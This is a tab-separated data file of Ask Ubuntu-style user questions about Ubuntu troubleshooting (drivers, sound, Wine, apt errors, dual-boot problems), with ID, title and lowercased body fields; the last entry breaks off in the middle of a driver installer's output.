290305	how do i run a windows program inside an iso file ?	i 'm using lubuntu . i need to run a windows program which is inside an iso file ( no installation required ) . the iso contains 2 files : one exe ( small ) and one dat ( big ) . i have mounted the iso file on /media/iso . i browse the content , i right click on the exe file and run it with wine . it says `` no disc inserted '' and stops . then i have mounted it on /cdrom and run it with wine on terminal ( wine filename.exe ) . same result , it says `` no disc inserted '' and stops . what can i do ?
290306	how can i stop steam from polluting my home directory ?	i 've just installed steam , and i 've noticed that steam has created a lot of files and directories in my home directory : such as : linux32 result steamdeps.txt steam_install_agreement.txt steam_latest.deb steam.sh ubuntu12_32 can i safely remove these files from my home directory ? if not , what would you advice to clean up my home directory ? is there any way to stop steam from polluting my home directory in the future ?
290308	live usb persistence	i tried creating a live usb with the default ubuntu disk creator and the windows version of universal-usb-installer and they both work fine except persistence does n't seem to work . for example , i change the background image , reboot , i selected the `` try ubuntu '' option again at startup and the background is the default . same with installed packages . am i doing something wrong ? edit my computer did not came with any os preinstalled . it 's an asus p9x79 in case it matters .
290322	how to get and copy a too long output completely in terminal ?	in terminal a command has a too long output . but when i scroll back i see it is truncated and only the last part is shown . in gnome-terminal and konsole i have this problem . in xterm there 's not such problem but i can not copy the output in xterm . how can i get the complete output ?
290329	lenovo y500 dual booting ubuntu and windows 8 : stuck on purple screen	i 'm installing ubuntu 12.04 lts on my lenovo y500 with nvidia geforce 750m using uefi . what i 've done so far regular install with ubuntu disc . ( through legacy ) boot repair ( recommended ) ( through legacy ) boot up in uefi to os selection screen when i boot up i get the os selection screen , but when i select the ubuntu choice , my screen is stuck on a purple screen . nothing responds , no f2 , ctrl+atl+f1 , esc , nothing . i 've tried the following solutions , but have no luck : updated nvidia drivers : http : //www.dedoimedo.com/computers/ubuntu-quetzal-nvidia.html that got me to the screen with the ubuntu logo and the dots , but soon after crashed into a black screen with commands . i can also no longer access login terminal via boot recovery edited boot command : gfxmode nomodeset did nothing for me tried to regular boot through recovery : got to black screen with login terminal . could login to access system , but still does not boot to regular ubuntu . stuck on purple screen : nothing changed . tried nvidia answer : unable to install ubuntu on lenovo y500 with this , regular choice boots directly into login terminal , no gui or purple screen freeze . tried sudo nvidia-xconfig . did not visibly change anything . note : i am booting in uefi i did disable srt
290330	logitech k760 failing to pair . ubuntu 13.04	just finished installing 13.04 on a 5,1 macbook pro . everything was recognized and am very pleased with the os . i would like to pair my bluetooth keyboard but i am getting fail messages . i 'd appreciate any help . thanks . feel free to ask any clarifying questions . i used to use linux in 2006 , but have n't used it since , so i am new to ubuntu in its current iteration . edit : after attempting to connect via the included gui it gives me a passcode to type in on my wireless keyboard , which i proceed to do . it hangs for about 10-12 seconds , then says 'logitech k760 failed to connect ' thanks for the response . edit 2 : can confirm that the solution in this thread worked for me ( http : //ubuntuforums.org/showthread.php ? t=2101785 ) i am now typing this with my wireless keyboard ! : ) edit 3 : while edit 2 's solution did work , i 'd like to note that it only works if you keep your computer running at all times . any restarts or shut downs and you have to run the process all over again . i find this very cumbersome . if anyone knows of any permanent solutions , i am all ears ( or eyes in this case ) .
290331	can we list installed packages from a java 7 program ?	is it possible to list all installed ( official ) packages from a java 7 program ? if so , how could i do it ? is looking at /usr/bin enough or may i miss some packages ? regards
290333	how to setup db in postgresql 9.2.4 on 12.04.2 lts	i think i have postgresql running correctly on my box : i have a pid and i see that postgres is `` listening '' on port 5432 . i 'm trying to create a db to experiment with , using the `` book '' db outlined in c. fehily 's book `` visual quickstart sql '' . i 've tried a bunch of approaches , but have had no joy . latest approach is : $ su postgres password : postgres @ piglet : /etc $ createdb books createdb : could not connect to database postgres : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? postgres @ piglet : /etc $ i 'm not sure if i 'm hitting the wall on passwords or authorizations , or something else . i 'd sure welcome some suggestions . thanks in advance !
290335	display and audio problem after update from 12.10 to 13.04	i was previously running ubuntu studio 12.10 . when i first installed 12.10 i had no sound or playback . i fixed that problem by installing the gnome alsa mixer . i just finished upgrading to 13.04 . now my screen resolution is smaller ( previously 1080p ) with a black border surrounding it . i also have no audio playback . i have tried i have a zotac motherboard itx series with built in nvidia graphics using a hdmi output , 64 bit intel atom ion processors , 4 gb ram and a corsair gt ssd .
290346	no sound in 13.04 on a tp x230	all sound devices are correctly detected and modules loaded . had a look at the community docuemntation and ran aplay -l in ther terminal and got this : cookies @ thinkpad-x230 : ~ $ sudo aplay -l **** list of playback hardware devices **** home directory not accessible : permission denied the hard drive is encrypted and so is my home folder . any ideas ? solution : ask ubuntu is a bit ... weird to put it nicely . a bit ridiculous but i found my answer , and since i ca n't post comments with proper spacing , and ca n't answer my question i 'll be dumping here : here what i actually did , from here : # vim /etc/pulse/default.pa uncomment : load-module module-alsa-sink as i can understand from here , things should work normally , but for some reason the daemon does n't want to play . still a hack , but things work .
290347	updater keeps saying failed to download repository information check your internet connection . on 12.10	updater keep saying : failed to download repository information . check your internet connection . details : w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
290352	show metadata columns ( duration tracknumberr , etc . ) with nautilus on 13.04	i recently updated to 13.04 and everything works smoothly but i ca n't seem to find a solution to show more metadata columns in files 3.6 ( nautilus ) . on 12.10 i was able to install nautilus-columns to add this functionality . that does n't seem to work anymore . is there anything i can do on 13.04 to show the metadata columns ? i already tried downgrading nautilus to 3.4 but that did n't work out well . i 'd really appreciate it if someone could find a way to show the columns without changing the file manager installed .
290365	theme listview text pulled from xml ?	i 've been working on my msm touch app and got to a point were i get the needed info from an xml file , but it is unthemed , and not as good looking as other `` direct '' text is . its black and further to the left . this is my code to show the needed info : // server status listitem.thindivider { } //can be used as header for list listitem.standard { listview { model : xmlmodel delegate : text { text : `` serverstatus `` + serverstate } } showdivider : false } i 'm using xmllistmodel to get the info . so . why is the text not like the rest , and how do i fix it ?
290367	12.04 unity 2d - dragging windows barely works	i 'm currently running 12.04 in vmware player on a windows 7 64bit machine and i 'm experiencing a lot of trouble with dragging windows around . one of my biggest issues is that very often i 'll snap a window off from its maximized state , by dragging it down a couple of inches to the middle of the screen . then the instant i try to drag it again , it will one of three times ( very roughly ) maximize back up to full size . if this is something like the home window , it will almost always accidentally lead to having that initial click n drag start dragging a folder on disk to some other folder . i have moved my dropbox folder gosh knows where several times . i tried disabling grid and snapping windows in compizconfig settings manager , but that does n't seem to be making any difference . in addition to this , i 've been having trouble just dragging windows in general . sometimes the drag will not register at all , and the cursor changes from a hand to a regular pointer right after i click . no idea what 's going on . what do i do ? how i disable all these niceties ? thank you !
290372	13.04 unity - dash loses keyboard focus while typing	i recently updated to 13.04 . about half the times when i open unity dash ( super / windows key ) and start typing the input field loses focus after a couple of keystrokes . i 'll then have to set the focus again by using the mouse - needless to say that this is very annoying . it happens in 90 % of the cases , but it is not always reproducible by typing the same text again . my best guess is that it occurs when some unity lenses return their individual search results ( that might be cashed the next time ) and probably steal focus . i disabled all online lenses which did not change the behaviour . anyone with similar issues / ideas / solutions ? update : posted this question about a month ago with very limited feedback . my guess is that most people do n't have this issue .
290375	unable to turn off wifi with fn-f2 keys	everything was fine on 12.04 lts . i fresh installed 13.04 . in 12.04 and windows ( now removed ) , fn-f2 keys were turning off wifi ( led off ) . in 13.04 this combination only turns off wifi in network manager ( led is still on ) . rfkill says that after pressing fn-f2 , wlan0 is blocked only by software . everything was fine on 12.04 . is anyway of fixing this without changing kernel to old one ? ( i have the latest kernel from repo ) .
290384	vpn on ubuntu 11.10 vps	i have been trying to install a vpn onto my vps . i have followed the tutorial here , however have had trouble getting it to work . can somebody please tell me how i should go about installing this vpn . kind regards ryan
290385	how do i get full resolution ?	i know this has been asked before , but i 've tried nearly every solution i could find . when i run additional drivers , it does n't come up with anything . after installing my graphics cards drivers via sudo apt-get , the highest resolution i can attain is still 1024x768 ( i want 1920x1080 ) . i have tried to edit xorg.conf to no avail , but i have a strong feeling i 'm messing something up . i do not know what is up with it . when it i ran lspci -v , this is what i got : 01:00.0 vga compatible controller : nvidia corporation device 11c0 ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : evga.com . corp. device 2660 flags : bus master , fast devsel , latency 0 , irq 16 memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=128m ] memory at e8000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] [ virtual ] expansion rom at f7000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia_current , nvidia_current_updates , nouveau , nvidiafb it says access has been denied regarding its capabilities . what does that mean ? is it even significant ? i 'm new to linux and just moved over from windows , and am still getting used to the new file types and use of the terminal and what not . thanks for any help given ! ( sorry for being such a newbie ! ) link to the requested pastebin of the sudo lshw . okay , it 's fixed now . at full resolution . after going through the terminal and downloading and updating i think x-swat , and then restarting , it fixed it . thanks for the help and friendliness , guys .
290387	trouble updating `` sudo apt-get update ''	i 've been trying to install ruby on rails and it requires me to run this command . i am new to linux so i 'm not very familiar with everything but this is what comes out after i type `` sudo apt-get update '' hit http : //archive.ubuntu.com precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg ign http : //ppa.launchpad.net precise release.gpg hit http : //archive.ubuntu.com precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release ign http : //ppa.launchpad.net precise release hit http : //archive.ubuntu.com precise/main i386 packages hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translationindex err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
290392	stuck with unity 2d after installing 12.04lts , no idea how to get to unity 3d	i have freshly installed ubuntu 12.04 lts 64 bit on a dual-boot with windows 7 64 bit , and the first thing i did was to install myunity by sudo : sudo apt-get install myunity i also ran several commands on the terminal to make ubuntu recognise my touchpad as a touchpad , not a mouse . it worked fine . i know realise , when i run myunity , that an error pops up and says that i am in unity 2d . i have read posts but never had a clear answer . i know it must have something to do with my nvidia gt540m optimus with a intel hd 3000 . i have also heard of bumblebee , which can solve nvidia/optimus issues . so i basically want to know how to put unity in 3d mode , and enable some sort of support for my nvidia cards . i am only 14 , and beginning on ubuntu , after a disastrous trial on mint 13 , so i would enjoy some very clear instructions and answers : ) my specs : asus k53sv cpu : intel i5 2410m 2.3ghz ; intel hd 3000 graphics ram : 4gb ram gpu : nvidia cuda gt540m @ gb optimus w/ intel hd 3000 hdd : ata hitachi 640gb i do n't know what motherboard i have..
290394	dim desktop , bring focus to active window	i recently stumbled upon this article for applications that dim the background of your desktop , bringing focus to the active open window . of course the applications are for windows . my question is , are their applications like this for ubuntu too ? i think compiz can do it but i would rather not use compiz .
290395	why am iâ not getting `` main '' updates ?	i recently upgraded from ubuntu 12.10 to 13.04 and since then i have the strong impression that i am not getting any update for the main packages . in fact , since the upgrade to ubuntu 13.04 some 15 days ago , i runsudo apt-get update regularly and look at what packages are updated . based on my experience with ubuntu , i can tell i am getting updates only for ppas ( like novacut ) and partner repositories ( like skype ) . i am not getting updates for other packages . i do n't get any error message when running sudo apt-get update . i am still able to install whatever i want with the software center or the command line . here is the content of /etc/apt/sources.list : # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - alpha amd64 ( 20130402.1 ) ] / raring main restricted # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //ftp.uni-erlangen.de/mirrors/ubuntu/ raring main restricted universe # # major bug fix updates produced after the final release of the # # distribution . deb http : //ftp.uni-erlangen.de/mirrors/ubuntu/ raring-updates main restricted universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ftp.uni-erlangen.de/mirrors/ubuntu/ raring multiverse deb http : //ftp.uni-erlangen.de/mirrors/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //ftp.uni-erlangen.de/mirrors/ubuntu/ raring-security main restricted universe deb http : //ftp.uni-erlangen.de/mirrors/ubuntu/ raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main # deb-src http : //extras.ubuntu.com/ubuntu quantal main deb http : //repository.spotify.com stable non-free # spotify # deb http : //apt.last.fm/debian raring main # last.fm disabled on upgrade to raring # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb-src http : //extras.ubuntu.com/ubuntu raring main how can i check whether my impression is correct ? how do i correct the problem ? i tried deleting the /etc/apt/sources.list file and then repopulating it automatically by running an update , but nothing changed .
290396	ubuntu eclipse completely broken	for some time now i have had problems with eclipse giving 100 % cpu when starting up . after making a new workspace and switching to it , i noticed android dev tools no longer show up anywhere . in fact , file-new-project only shows `` general '' and `` cvs '' projects . i have ia32 libs , eclipse-jdt , but nothing shows up except in the help-install new software , which says it 's installed .
290404	how to reduce brightness for sony vaio with 7650 hd	i just installed ubuntu 12.10 on a sony vaio laptop . the brightness functions keys do n't change the brightness . when i try to change the brightness i can see the levels going up and down in the notification bubble but it does n't actually change the brightness . is there any way to fix this ? i tried this link but it did n't work . moreover i have installed additional amd drivers and i am using xorg drivers
290408	xfce gtk themes not working at all	i can not use any gtk themes at all in xubuntu 13.04 . it worked up until i tried to ( unsuccessfully ) setup 3 monitors . edit : i ran gtk-window-decorator -- replace and got window manager warning : failed to load theme `` adwaita '' : failed to find a valid file for theme adwaita i do not have adwaita selected on the appearance gui , in fact , it is not even an option . where is it pulling that value from ?
290409	rockbox not detecting ipod mount	the rockbox utility is n't detecting my ipod in the `` select your device in the filesystem '' drop down list . the ipod is detected with other programs . any ideas ? ubuntu 12.04 64 bit . ipod 5g 80gb .
290412	ubuntu 13.04 adding extra clicks . loose grip when dragging	i just installed ubuntu 13.04 and notice that my mouse is behaving weirdly . if i try to drag a selected text , folders or files , sometimes the selection will loose . if i make one click , sometimes , it will add two clicks . it happens in both my laptop and the desktop machines . two different mouse . how can we fix this ?
290414	how to speed up ubuntu 12.04 ?	i am using ubuntu 12.04 and my system is too much slow , i want to speed it up . i have tried several apps and methods like jupitar , cleaning tmp file ; but still my system is too much slow . system haveing : 4gb ram , i3 intel processor , 700 gb hdd , 2 gb graphic card what should i do ?
290417	software recommendation low level , relatively verbose audio libraries	i recently changed window managers to dwm , and one of the things that i 've really enjoyed about it is having to figure out a lot more about how exactly ubuntu handles things like wireless connections . i 'm looking for something similar for music . i 'm looking for something that is a command line utility that will put me very close to the metal of how playing music actually works . i 've seen a lot of recommendations for command line based audio players , but i 'm looking for something that a lot of people seem to not be looking for . i 'm looking for something along the lines of write a shell script to make a playlist . any good packages like this ?
290423	how to import a pdf in libreoffice ? under ubuntu , all pages are blank	i have some .pdf generated by a scanner , that i want to import in libreoffice and do some small editing . the pdf has only one object per page , a page-size image . if i open it in libreoffice under ubuntu 12.10 , it imports `` successfully '' but all pages are blank . i have the libreoffice-pdfimport package installed . that is true with both libreoffice 3.6 ( part of ubuntu 12.10 ) and with 4.0.2 , from libreoffice ppa . the same .pdf files open perfectly fine on both libreoffice for windows and libreoffice for mac ( yes , i have three computers with all three oses ) , but on ubuntu 12.10 , all pages are blank , so i can only conclude this is an issue with ubuntu packaging , or something really weird prevents it from working under linux . how can i import these kinds of .pdf into libreoffice for editing ?
290425	shut down acts as restart ?	i 've installed ubuntu ( almost all latest versions ) , when my acer aspire v5-471 is want to shutdown from ubuntu , it acts as restart/reboot . refer to edit 2 for releases tried and edit 1 for tried derivatives . edit 1 : it 's happens on 2 versions ( till now ) , ubuntu and ubuntu studio/xubuntu ( both ubuntu-studio and xfce session ) . edit 2 : same as edit 1 ( only for live-user , others only uses ubuntu ) , happened on normal installation ( 12.04 to 13.04 ) , wubi installation ( 12.04 only ) , and live user session ( 12.04 to 13.04 ) . rebooted after short shutdown time even as root or sudo-ing from this command : shutdown -h now why ? can i fix this ?
290426	starting and stopping of applications	i need to make my restart process lesser commands . i dont want to code anything or create a service . so i created 2 scripts to do that . but even then the process is too lengthy . is there a way to kill the application without the process id or a way to kill the process with just one command . start script nohup memcached -m 64 -p 11211 -u 11211 -l ipa 2 > & 1 > $ 1memcached.log & sleep 2 nohup java -classpath mcruiseonserver_lib/ -jar mcruiseonserver.jar > & 1 > $ 1mcruiseon.log & check process id 's ( and manually call kill -9 ) ps -ef | grep java ps -ef | grep memcached
290429	wont load windows 8 pro from grub 2.0 ( ubuntu 13.04 )	just installed dual-boot ubuntu 13.04 on my self-built windows 8 pro pc , and after the installation i restarted , and once i was prompted with grub 2.0 i tried to boot off of windows 8 , and a few seconds after i selected the os it would restart my computer entirely . i am clueless when it comes to linux entirely as i am a gamer and video editor it is not the best option for my needs , but all of my friends have been telling me to dual-boot so i did . i am very afraid of loosing all of my data on my hard drive and such because a large portion of my job is done on that hard drive . system information : system processor : intel core duo 6700 2.66 ghz system dram : 8gb ddr2 dram graphics processor : sapphire amd 5570 1gb gddr3 motherboard : abit ab9 pro storage : 1tb western digital caviar green , 500gb , 80gb
290434	asus eee pc seashell series intel® atom™ cpu n2600 @ 1.60ghz × 4.. best ubuntu version/flavor for my	i am new to ubuntu ... because of my windows problems i completely erased it and installed through usb while wifi on , the latest version of ubuntu13.04.. everything is working fine and perfect . but it is real real dead slow . the below is the configuration i got through settings . processor : intel® atom™ cpu n2600 @ 1.60ghz × 4 memory : 2gb graphics : gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) os type : 32-bit disk : 312.8gb please suggest me which flavor of ubuntu is best to get the good speed .
290437	how to install adode flash on a live usb ?	i 'm running ubuntu 13.04 on my computer from a live usb . i 'm not able to watch youtube videos . am i able to install adobe flash and if so how do i add it to the live usb .
290443	bumblebee : can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected	after upgrading to 13.04 , i get this error and other answers ( optirun glxgears : can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected , ' can not access secondary gpu ' error with bumblebee ) did n't help . dpkg -l | grep nvidia ii bumblebee-nvidia 3.2.1-1~raringppa2 amd64 nvidia optimus support using the proprietary nvidia driver ii nvidia-310 310.44-0ubuntu2 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings-310 310.44-0ubuntu1 amd64 tool for configuring the nvidia graphics driver this is my /etc/bumblebee/bumblebee.conf : http : //pastebin.com/g9r55vmr this is /etc/bumblebee/xorg.conf.nvidia : http : //pastebin.com/9xnupp6b this is /etc/modprobe.d/blacklist.conf : http : //pastebin.com/tcnscz0b this is /etc/modprobe.d/bumblebee.conf : http : //pastebin.com/wtx1lr9d this is /etc/modprobe.d/nvidia-310_hybrid.conf : http : //pastebin.com/cbvg2fn1 my /etc/bumblebee/xorg.conf.d folder contains only 10-dummy.conf file , that is empty . this is /var/log/xorg.8.log : http : //pastebin.com/ismxt7ae this is optirun -vvv glxspheres output : http : //pastebin.com/rbyuhrnr ask for further details , if needed !
290449	use existing ssh keypair in juju	how can i use an existing ssh keypair with juju ? when running juju bootstrap i 'm getting this error : error : environment has no access-key or secret-key . i 've already setup an ssh keypair a long time ago to use with git . so when i run ssh-keygen -t rsa -b 2048 i 'm being asked if i want to overwrite it . i 'm using ubuntu 13.04 .
290452	installing workaround realtek drivers for edimax , but getting error	vitt @ vitt-system-product-name : ~/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 $ sudo sh install.sh [ sudo ] password for vitt : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # realtek wi-fi driver auto installation script novembor , 21 2011 v1.1.0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # decompress the driver source tar ball : rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105.tar.gz rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/clean rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ieee80211.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ht.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_event.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_sreset.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/recv_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/generic.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/little_endian.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/swabb.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/swab.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/big_endian.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cphyreg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cphycfg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_pwrctrl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192detesthwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_version.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ethernet.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_br_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_qos.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_p2p.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/xmit_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp_ioctl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cehwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/mlme_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/h2clbk.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_xp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_vendor_req.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_eeprom.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/farray.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dphycfg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ioctl_cfg80211.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_dm.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/if_ether.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_ce.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_security.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_rtl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192duhwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cuhwimg_wowlan.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/wlan_bssdef.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mlme_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dphyreg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/wifi.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_event.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dehwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cuhwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/nic_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_intf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_ce.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_linux.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/circ_buf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_byteorder.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192duhwimg_wowlan.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_set.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_dm.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mlme.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/mp_custom_oid.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ip.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_query.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal_init.h 